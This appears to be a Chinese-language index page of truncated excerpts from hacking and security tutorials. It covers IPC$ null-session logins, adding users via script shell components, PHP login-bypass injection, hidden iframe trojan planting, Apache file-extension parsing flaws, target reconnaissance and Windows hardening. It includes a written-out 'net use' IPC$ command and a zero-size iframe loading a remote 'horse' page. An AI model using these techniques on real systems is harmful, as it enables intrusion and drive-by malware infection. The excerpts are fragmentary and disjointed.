安全教程

　　应用程序级的安全漏洞通常不会像类似SirCam的邮件病毒或者诸如Code Red这样的蠕虫病毒那么容易广为扩散，但它们也同样会造成很多问题，从窃取产品或信息到使整个Web站点完全瘫痪。确保网站web应用程序的安全不是一件简单的事，而不幸的是对应用程...

　　net use\\\\192.168.0.1\\ipc$Content$nbsp;"" /user:administrator 　　提到139端口，我想知道的人一定非常多，本来是不想用写这个教程的，但考虑要照顾到新人，所以还是简...

它还同时调用了 wscript.shell、Shell.Application、Shell.LocalMachine这三个组件.不过加用户的话,这一个 Shell.Users就足够了.那么可能在删掉了net.exe和不用adsi之外,这也可能是一种新的...

Win2k的缺省安装很容易被攻击者取得帐号列表，即使安装了最新的Service ack也是如此。 　　方案一 　　1.打补丁 　　微软的作风就是三天一小补，五天一大补，漏洞太多，补一点就好一点，使用“开始-WindowsUpdate&quo...

可是有的人说对PHP的站如果是GPC魔术转换开启，就会对特殊符号转义，就彻底杜绝了PHP注入。 其实说这话的人没有好好想过，更没有尝试过用万能密码进PHP的后台。 其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。 如果你用这样的万能密码\&...

这次漏洞出在channeldmectr.asp这个文件上,跟本就没有过滤任何参数. 正好我这里有正版的补丁,打开看下了,打上补丁的channeldmectr.asp文件在第21行到第40行,增加了以下代码: 复制代码 代码如下: Function Sa...

1，挂马的N种方法 　　(1) HTML挂马法。 　　常规的HTML挂马方法一般是在网页中插入一条iframe语句，像<iframe src=http://www.xxx.com/horse.html width=0 height=0>&l...

主要问题是：不管文件最后后缀为什么，只要是.php.*结尾，就会被Apache服务器解析成php文件，问题是apache如果在mime.types文件里面没有定义的扩展名在诸如x1.x2.x3的情况下，最后一个x3的没有定义，他会给解析成倒数第二个的x...

今天的内容是获得主机的信息。 我们要黑一台主机，首先要了解它的信息，　　包括它的类型，用户列表，目录，端口，漏洞等等。　　首先我们我们要找一台主机来练手，随便挑吧！www.dddd.com(乱说的)第一部，呵呵，　　先在ie里看看吧，mmmm̷...

用Google浏览器浏览此篇文章，并点击下面的字符： 　　EVIL:% 　　是不是很爽，^_^。

正则表达式的基本语法 　　首先让我们看两个特殊的符号\’^\’和\’$\’。他们的作用是分别指出一个字符串的开始和结束。例子如下： 　　 　　"^The"：表示所有以"The...